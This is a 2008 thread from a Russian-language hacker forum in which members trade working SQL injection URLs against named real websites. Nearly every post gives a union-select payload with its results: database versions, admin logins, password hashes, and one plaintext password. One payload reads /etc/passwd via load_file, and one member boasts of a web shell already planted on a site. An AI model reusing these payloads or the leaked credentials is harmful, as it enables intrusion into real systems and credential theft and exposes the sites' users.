 |
|
05.07.2008, 23:40
|
|
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами:
9394946
Репутация:
2
|
|
http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
|
|
|
06.07.2008, 00:13
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0 |
|
|
|
06.07.2008, 00:34
|
|
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами:
9394946
Репутация:
2
|
|
K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
|
|
|
|
06.07.2008, 00:50
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
С нами:
9769519
Репутация:
415
|
|
Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ
Сообщение от kair
http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*
При инъекции в скрипте persons.php можно узнать немного больше
Код:
http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user(),5,6,7,8,database(),10--
VERSION(): 4.0.24_Debian-10sarge2-log
DATABASE(): tuzbycom
USER(): tuzbycom@localhost
Так же подвержен скуль-инъекции скрипт
Код:
http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--
|
|
|
|
06.07.2008, 01:08
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/*
Version: 5.0.33
uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=) |
|
|
|
06.07.2008, 01:39
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=) |
|
|
|
06.07.2008, 08:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Davinciinstitute.com - PR 6
http://www.davinciinstitute.com/page.php?ID=-1'+union+select+1,2,3,concat_ws(0x3a,LoginName,Pas sword),5,6+from+AdminUsers/*
как разшифровать? попробвал hex(ascii)=md5
Bouldertheater.com - PR 6
http://www.bouldertheater.com/event_detail.php?id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41+from+information_schema.tables+limit+1 7,1--
Umpcportal.com - PR 6
http://www.umpcportal.com/products/product.php?id=9999999+union+select+version(),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Linspire.com - PR 7
http://www.linspire.com/linspire_letter_archives.php?id=9999999+union+sele ct+1,version(),3,4/*
Allianceforbiz.com - PR 6
http://www.allianceforbiz.com/events/specific_event.php?id=999999+union+select+1,versio n(),3,4/*
Koleso.topof.ru - PR 4
http://koleso.topof.ru/testing_info.php?id=9999+union+select+1,2,concat_w s(0x3a,admin_login,admin_password),4,5,6,7+from+ko leso_ktopof.admins/*
Cccs.com - PR 5
http://www.cccs.com/index.php?id=99999+union+select+1,2,3/*
увы.. но для вывода нужно зарегатся..(
Последний раз редактировалось sabe; 13.07.2008 в 07:44..
|
|
|
|
06.07.2008, 11:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Да, чёта меня на метео потянуло...
gismeteo.ru
Google PR 6 / 10
Яндекс тИЦ 19000
http://avia.gismeteo.ru/avia.php?id=27612+union+select+1+limit+1,1--
Database Version: 4.1.1-alpha-standard
Database name: search
User name: root@localhost
__________________
BlackHat. MoDL
|
|
|
|
06.07.2008, 12:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Viperson.ru - PR 4
http://www.viperson.ru/wind.php?ID=999999+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(Version()),0x71),0x71)/*
Cyberthing.net - PR 3
http://www.cyberthing.net/video-play.php?id=9999+union+select+1,table_name,3,4,5,6 ,7+from+information_schema.tables/*
Dimi4
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(load_file(0x2F6574632F706173737764),0x71),0x7 1)+limit+1,1--
load_file никто не отменял..)
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(concat_ws(0x3a,user,password),0x71),0x71)+fro m+mysql.user+limit+1,1--
и это. но сдесь почемуто на рута пасса нету 
Последний раз редактировалось sabe; 06.07.2008 в 12:57..
|
|
|
|
06.07.2008, 15:27
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
pr-cy.ru
pr-cy.ru
http://pr-cy.ru/faq/-21+union+select+1,2,3.html
5.0.51a-community-log
доступны только стандартные таблицы и одна таблица FAQ ..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Illuminati]](/avatars/avatar60378.jpg?761776){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?761828){kind=avatar}
![Аватар для [Illuminati]](/avatars/avatar60378.jpg?761870){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?761938){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?761970){kind=avatar}
Линейный вид
